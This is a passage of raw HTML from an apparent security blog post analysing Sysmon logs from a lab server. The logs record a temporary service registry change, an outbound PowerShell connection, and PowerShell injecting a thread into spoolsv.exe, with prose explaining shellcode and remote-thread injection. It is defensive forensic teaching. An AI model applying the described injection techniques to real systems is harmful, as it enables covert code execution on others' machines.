word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Followed by another Registry set value event, probably cleaning up the service as it is no longer needed.</font></span></div><div 
style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:17 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>13</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Registry value set (rule: RegistryEvent)</font></span></p><p class="p1" 
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: 
normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Registry value set:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: T1031,T1050</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">EventType: SetValue</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:17.225</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-bb4e-5f13-9e5b-000000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 468</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: 
monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\system32\services.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetObject: HKLM\System\CurrentControlSet\Services\axfvos\Start</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Details: DWORD (0x00000004)</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And another outbound 
connection:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:18 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>3</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Network connection detected (rule: NetworkConnect)</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Network connection detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:14.249</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: 
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Protocol: tcp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Initiated: true</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceIp: 10.47.47.17</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;">SourceHostname: wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePort: 53247</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">SourcePortName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">DestinationIsIpv6: false</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationIp: 10.47.47.26</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationHostname: -</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: 
normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPort: 80</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">DestinationPortName: http</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And now for something completely different. 
Our PowerShell process calls </font><font face="courier"><a href="https://www.google.com/search?q=win32+createremotethread&oq=win32+createremotethread&aqs=chrome.0.69i59j69i60.4519j0j7&sourceid=chrome&ie=UTF-8" target="_blank">CreateRemoteThread()</a></font><font face="inherit"> against spoolsv.exe:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:04:30 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 
10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CreateRemoteThread detected:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:04:30.116</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: 
monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">SourceImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessGuid: {fc3f293c-bb50-5f13-4008-010000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetProcessId: 1120</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">TargetImage: C:\Windows\System32\spoolsv.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">NewThreadId: 212</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span 
class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">StartAddress: 0x0000000000DC0000</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartModule: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartFunction: -</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above we looked at PowerShell allocating memory in its own process, populating that memory with shell code and creating a thread of execution. 
This is similar, but </font><font face="courier">CreateRemoteThread()</font><font face="inherit"> is used for starting a new thread of execution in another process. You might wonder why this is even possible in Windows. Microsoft's <a href="https://devblogs.microsoft.com/oldnewthing/author/oldnewthing" target="_blank">Raymond Chen</a> <a href="https://devblogs.microsoft.com/oldnewthing/20120808-00/?p=6913" target="_blank">explains</a>.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:05:04 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span 
class="Apple-converted-space"> </span>8</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: CreateRemoteThread detected (rule: CreateRemoteThread)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" 
